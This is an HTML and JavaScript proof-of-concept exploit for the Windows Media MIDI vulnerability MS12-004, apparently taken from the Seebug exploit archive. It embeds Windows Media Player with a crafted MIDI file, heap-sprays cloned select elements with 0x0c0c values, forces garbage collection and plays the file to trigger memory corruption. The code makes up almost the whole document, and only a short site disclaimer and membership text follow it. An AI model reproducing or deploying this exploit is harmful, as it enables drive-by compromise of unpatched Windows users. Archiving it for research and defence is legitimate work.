// http://sebug.net/paper/Exploits-Archives/2012-exploits/1201-exploits/MS12-004_poc.zip <object id="midi1" classid="clsid:22d6f312-b0f6-11d0-94ab-0080c74c7e95" codebase="http://activex.microsoft.com/activex/controls/mplayer/en/nsmp2inf.cab#version=5,1,52,701" standby="loading microsoft windows media player components..." type="application/x-oleobject" width="320" height="310"> <param name="filename" value="./toto.mid"> <param name="animationatstart" value="true"> <param name="transparentatstart" value="true"> <param name="autostart" value="false"> <param name="showcontrols" value="true"> <param name="ShowStatusBar" value="true"> <param name="windowlessvideo" value="true"> <embed src="./toto.mid" autostart="true" showcontrols="true" showstatusbar="1" bgcolor="white" width="320" height="310"> </object> <script> var cloned = new Array(); var numCloned = 50; function bang() { for (var i = 0; i < numCloned; i ++) { if ( cloned[i] != null ) { var s = cloned[i].w0.toString(); //alert(s); } } } function exploit() { var selob = document.createElement("select"); selob.w0 = unescape("%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c%u0c0c"); selob.w1 = this; selob.w2 = new Array(); selob.w3 = true; selob.w4 = 0x41424344; selob.w5 = document.createElement("marquee"); selob.w6 = undefined; selob.w7 = null; selob.w8 = alert; selob.w9 = RegExp.$1; selob.w10 = Infinity; selob.w11 = NaN; selob.w12 = new Date(); for (var i = 12; i < 60; i ++) { selob["w"+i.toString()] = 0x41424344; } for (var i = 0; i < numCloned; i ++) { cloned[i] = selob.cloneNode(true); } for (var i = 1; i < numCloned; i += 7) { cloned[i] = null; } CollectGarbage(); midi1.play(); setTimeout(function(){bang();}, 5000); } setTimeout(function(){exploit();}, 3000); </script>
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
京公网安备 11010502034610号
暂无评论